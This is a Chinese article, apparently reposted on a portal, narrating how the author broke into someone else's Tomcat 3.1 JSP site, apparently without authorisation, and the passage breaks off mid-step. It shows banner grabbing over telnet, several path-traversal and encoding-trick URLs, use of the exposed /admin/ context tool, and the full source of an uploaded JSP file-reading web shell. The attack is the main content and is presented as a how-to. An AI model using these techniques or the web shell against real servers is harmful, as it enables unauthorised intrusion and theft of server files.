现场纪实――如何入侵基于JSP的网站

王朝java/jsp·作者佚名  2008-05-21
窄屏简体版  字體: |||超大  

很偶然的一个机会,浏览到一个网站,页面清新让人感觉很舒服。网站是用JSP开发的,出于个人爱好,我决定测试一下其系统的安全性。telnet www.target.com 8080GET /CHINANSL HTTP/1.1[Enter][Enter]

返回的结果如下:HTTP/1.0 404 Not FoundDate: Sun, 08 Jul 2001 07:49:13 GMTServlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)Content-Language: enContent-Type: text/htmlStatus: 404〈h1〉Error: 404〈/h1〉〈h2〉Location: /CHINANSL〈/h2〉File Not Found〈br〉/CHINANSL

获得了运行的WEBServer的名称“Tomcat 3.1”。记得曾经发现过这个版本的漏洞,并且post到bugtrap上去过。

回忆一下,大概是通过“..”技术可以退出WEB目录,于是:http://target:8080/../../../../%00.jsp (不行)http://target:8080/file/index.jsp (不行)http://target:8080/index.JSP (不行)http://target:8080/index.jsp%81 (不行)http://target:8080/index.js%70 (不行)http://target:8080/index.jsp%2581 (不行)http://target:8080/WEB-INF/ (不行)

看来安全状况似乎还不错,我们再来进行一下更深层的测试。Tomcat 3.1自带了一个管理工具,可以查看WEB下的目录及文件,并且可以添加context。于是尝试:http://target:8080/admin/

管理员果然没有删除或禁止访问这个目录,从安全的角度说,这点应该算是一个比较重要的失误。

接着,点击“VIEW ALL CONTEXT”按钮,列出了WEB目录下的一些文件和目录的名称,很快发现了一个上传文件的组件,通过这个组件将一个JSP文件上传到对方的WEB目录里:〈%@ page import="java.io.*" %〉〈%String file = request.getParameter("file");String str = "";FileInputStream fis = null;DataInputStream dis = null;try{fis = new FileInputStream(file);dis = new DataInputStream(fis);while(true){try{str = dis.readLine();}catch(Exception e){}if(str == null)break;out.print(str+"〈br〉");}}catch(IOException e){}%〉

然后执行:

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航